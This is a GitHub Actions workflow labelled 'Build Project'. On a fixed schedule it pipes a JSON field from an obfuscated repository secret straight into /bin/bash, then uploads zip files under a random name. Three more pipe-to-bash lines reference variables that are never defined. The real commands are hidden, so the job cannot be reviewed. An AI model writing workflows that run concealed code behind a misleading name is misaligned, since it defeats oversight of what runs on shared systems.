name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '33 5,11,17,23 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  invoke:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run pipeline
        env:
          zqgl970: ${{ secrets.zqgl970 }}
        run: |
          printf '%s' "$zqgl970" | jq -r .zxzun992 | /bin/bash
          printf '%s' "$xd8236" | jq -r .bjo4 | /bin/bash
          printf '%s' "$oqh78" | jq -r .nyow4 | /bin/bash
          printf '%s' "$mhx8" | jq -r .sojal9 | /bin/bash

      - name: Upload archive
        uses: actions/upload-artifact@v4
        with:
          name: 8K6B2zUG
          path: "*.zip"
          retention-days: 1
